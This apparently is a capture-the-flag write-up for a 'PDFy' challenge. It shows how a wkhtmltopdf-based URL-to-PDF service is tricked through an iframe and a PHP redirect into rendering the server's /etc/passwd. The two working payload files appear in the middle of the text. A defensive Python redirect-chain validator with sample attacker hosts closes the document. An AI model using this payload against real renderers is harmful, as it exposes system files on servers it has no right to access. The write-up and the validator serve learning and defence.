Welcome to PDFy, the exciting challenge where you turn your favorite web pages into portable PDF documents! It's your chance to capture, share, and preserve the best of the internet with precision and creativity. Join us and transform the way we save and cherish web content! NOTE: Leak /etc/passwd to get the flag!
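Opening the challenge shows a website with a web page screenshot feature: you enter a URL and it captures that page.
At first glance this is SSRF.
Entering arbitrary input triggers an error.
The error output reveals that the backend actually uses wkhtmltopdf.
Searching its issues turns up several SSRF reports.
From a quick look, the approach is to create two files: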
index.html
<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <style>
        body {
            font-family: Arial, sans-serif;
            text-align: center;
            margin-top: 50px;
        }
        iframe {
            width: 80%;
            height: 400px;
            border: 1px solid #ccc;
            margin-top: 20px;
        }
    </style>
</head>
<body>
    <iframe src="http://YOUR_PUBLIC_IP_OR_GITHUB_PAGES_URL/redirect.php" title="Local File Loader"></iframe>
</body>
</html>
redirect.php
<?php
header("Location: file:///etc/passwd");
exit();
?>
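Host both files on a public IP and submit the URL of index.html to the service. It renders the page, and the iframe inside it, after following the redirect, loads the contents of the server's own /etc/passwd file.
The saved PDF then contains the file.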
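
A defensive check for the redirect trick above, as an added example that is not part of the original writeup: validating only the submitted URL misses the hop from redirect.php to file:///etc/passwd, so an egress filter in front of the renderer has to apply its policy to every hop. The function names, the sample hosts and the response table are constructed assumptions, and the loopback case goes slightly beyond the file:// case shown in the writeup.

```python
from urllib.parse import urljoin, urlsplit
import ipaddress

ALLOWED_SCHEMES = {"http", "https"}
MAX_HOPS = 5

# Constructed sample responses (not captured traffic): URL -> (status, Location header)
SAMPLE_RESPONSES = {
    "http://attacker.example/index.html": (200, None),
    "http://attacker.example/redirect.php": (302, "file:///etc/passwd"),
    "http://attacker.example/internal": (302, "http://127.0.0.1/"),
    "http://blog.example/old": (301, "/new"),
    "http://blog.example/new": (200, None),
}

def url_allowed(url):
    """Allow only http(s) URLs whose host is not a loopback/private/link-local IP literal."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.hostname:
        return False
    try:
        ip = ipaddress.ip_address(parts.hostname)
    except ValueError:
        # A hostname, not an IP literal. A real deployment must also check
        # the addresses it resolves to; omitted here to stay offline.
        return True
    return not (ip.is_loopback or ip.is_private or ip.is_link_local)

def check_redirect_chain(url, fetch=SAMPLE_RESPONSES.get):
    """Follow redirects hop by hop; return (ok, reason, last_url_seen)."""
    for _ in range(MAX_HOPS + 1):
        if not url_allowed(url):
            return False, "blocked target", url
        status, location = fetch(url) or (404, None)
        if status not in (301, 302, 303, 307, 308) or not location:
            return True, "ok", url
        # Relative Location headers are resolved against the current URL.
        url = urljoin(url, location)
    return False, "too many redirects", url

if __name__ == "__main__":
    for start in SAMPLE_RESPONSES:
        print(start, "->", check_redirect_chain(start))
```

Because the iframe is fetched by the renderer itself, this policy only helps when it is enforced on the renderer's outbound requests (for example in a filtering proxy), not just on the URL the user typed into the form.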